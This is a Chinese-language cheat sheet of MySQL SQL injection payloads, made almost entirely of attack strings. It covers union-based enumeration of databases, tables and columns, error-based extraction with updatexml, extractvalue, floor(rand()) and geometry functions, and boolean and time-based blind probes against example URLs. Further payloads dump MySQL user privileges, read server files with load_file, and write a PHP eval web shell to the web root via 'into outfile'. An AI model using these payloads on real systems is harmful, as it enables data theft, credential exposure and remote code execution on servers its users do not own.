mysql sql注入小结

注释符：＃、 /*、— (后面加空格)
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line
空格：使用/**/或()或+代替空格

mysql.user                           /*存储mysql数据库的用户及用户权限信息
information_schema.schemata          /*存储mysql中所有数据库
information_schema.tables            /*存储mysql中所有数据库的表
information_schema.columns           /*存储mysql中所有数据库的列
information_schema.user_privileges   /*存储mysql中所有数据库的权限信息

select   /*用于输出信息；select 列名｜(数字｜字符串｜函数) as 别名（as可以省略）［from …］，注意使用select 函数来输出内容
union    /*联合操作符，注意前后列数相同，数据类型相差不大
group by /*分组
order by /*排序，order by 列名｜列序号
case expr when a then a** when b then b* else c* end  /*sql的switch语句
if(expr1, expr2, expr3)  /*if函数，当expr1为真返回expr2否则返回expr3

system_user()        /*系统用户名
user()               /*用户名
current_user()       /*当前用户名
session_user()       /*连接数据库的用户名
database()           /*数据库名
version()            /*MYSQL数据库版本
load_file()          /*MYSQL读取本地文件的函数
@@datadir            /*读取数据库路径
@@basedir MYSQL      /*安装路径
@@version_compile_os /*操作系统

concat()                          /*连接字符串
group_concat()
concat_ws()                       /*连接字符串，第一个参数为分隔符
char()                            /*获得字符串
left(str, len)                    /*截取str左边len位  
right(str, len)                   /*截取str右边len位
substring(str, pos, len)          /*截取字符串
rand()                            /*生成0至1的随机数
floor(n)                          /*向下取整 
name_conset(column_name, value)   /*用来产生一个结果集合

sleep(seconds) 停止seconds秒，用于time-based盲注
benchmark(times, function) 将function执行times次，该函数可用于time-based盲注，例如（benchmark(500000, encode(‘a’,’b'))）
encode(str, passwd_str) 使用passwd_str加密str函数

http://aaa.com/s.php?id=1'，如果返回页面提示syntax error，则说明有漏洞

http://aaa.com/s.php?id=1 and 1=1/and 1=2，and 1=1有返回，and 1=2无返回

例如：http://aaa.com/s.php?id=11-1

http://aaa.com/s.php?id=(select 10)

http://aaa.com/s.php?id=2 and sleep(10)或者http://aaa.com/s.php?id=2 and benchmark(500000, encode('msg','bbb'))

“ and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/* ”

例如：select * from sedb.site_tb where 1=2 union select 1,2,concat_ws(char(32,58,32),0x7c,user(),database(),version());

and 1=2 union select 1,schema_name,3,4 from information_schema.schemata/*

and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*

例如：select * from site_tb where 1=2 union select 1, 2, group_concat(schema_name) from information_schema.schemata;

and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=数据库名

and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=数据库名

例如：select * from site_tb where 1=2 union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema='sedb';

and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名 and table_schema=数据库名 limit 1,1/*

and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名 and table_schema=数据库名/*

例如：select * from site_tb where 1=2 union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='site_tb' and table_schema='sedb';

and 1=2 union select 1,2,3,字段1,5,字段2,7,8 from 数据库.表/*

select name,password from test.user where id={参数}

select colum1,colum2 from table where id={0} and {1} union {2}

select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a;
select 1 from (select concat(user(),left(rand(),3)),count(*) from information_schema.tables group by 1)a;
select 1 from (select concat(user(),right(rand(),3)),count(*) from information_schema.tables group by 1)a;

select name,password from user where id=1 union select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a
ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'

select 1 from (select name_const(version(),1),name_const(version(),1))x

select name,password from test.user where id=1 union select 1 from (select name_const(version(),1), name_const(version(), 1))x;

updatexml(1,concat(0x3a,user()),1)

select name,password from test.user where id=2 and updatexml(1,concat(0x3a,user()),1);

extractvalue(1, concat(0x5c,version()))

select name,password from test.user where id=2 and extractvalue(1, concat(0x5c, version()));

exp(~(select*from(select user())x))

select name,password from test.user where id=exp(~(select*from(select user())x));

GeometryCollection((select * from (select * from(select user())a)b))
polygon((select * from (select * from(select user())a)b))
multipoint((select * from (select * from(select user())a)b))
multilinestring((select * from (select * from(select user())a)b))
multipolygon((select * from (select * from(select user())a)b))
linestring((select * from (select * from(select user())a)b))

select name,password from test.user where id=2 and GeometryCollection((select * from (select * from(select user())a)b));

?id=1 and substring(@@version,1,1)=5
?id=5 and (select 1 from users limit 0,1)=1   猜解users表是否存在
?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1  猜解列名
?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

and (select count(file_priv) from mysql.user)>0/*
and 1=2 union select 1,2, concat_ws(':', host, user, file_priv) from mysql.user/*
例如：select * from site_tb where 1=2 union select 1,2, concat_ws(':', host, user, file_priv) from mysql.user;

create table a(cmd text);
load data infile '/Users/apple/tmp/test.txt' into table a;
select * from a;   /* mysql 3.x 5.x

create table a(cmd text);
insert into a(cmd) values(load_file('/Users/apple/tmp/test.txt'));
select * from a;   /* mysql 3.x 4.x 5.x

and 1=2 union select 1, 2, concat(load_file('/Users/apple/tmp/test.txt'))
例如：select * from site_tb union select 1, 2, concat(load_file('/Users/apple/tmp/test.txt'));

union select 1,2,3,char(这里写入你转换成10进制或16进制的一句话木马代码),5,6,7,8,9,10,7 into outfile ‘d:\web\90team.php’/*s
union select 1,2,3,load_file(‘d:\web\logo123.jpg’),5,6,7,8,9,10,7 into outfile ‘d:\web\90team.php’/*
例如：select * from site_tb union select 1, 2, '<?php eval(\"_POST[\'test\']\”);?>' into outfile 'shell.php';

insert into user(username,password) values(‘xxxx’,’ xxxx’),(‘dddd’,’dddd’)/* ‘);
update table set column=value where **/*

procedure analyse (extractvalue(1,concat(0x5c,version())),1);

select 1 from mysql.user procedure analyse (extractvalue(1,concat(0x5c,version())),1);
select 1 from mysql.user order by 1 procedure analyse(extractvalue(1,concat(0x5c,version())),1);
select 1 from mysql.user limit 1,2 procedure analyse(extractvalue(1,concat(0x5c,version())),1);
select 1 from mysql.user order by 1 limit 1 procedure analyse(extractvalue(1,concat(0x5c,version())),1);

select user,password from users where user_id=1 union(select 1,schema_name from information_schema.schemata limit 1)

 select user,password from users where user_id=1 union (select 1,(select 2))

select user,password from users where user_id=1 union(select 1,(select schema_name from information_schema.schemata limit 1))

id=5 and (select 1 from users limit 0,1)=1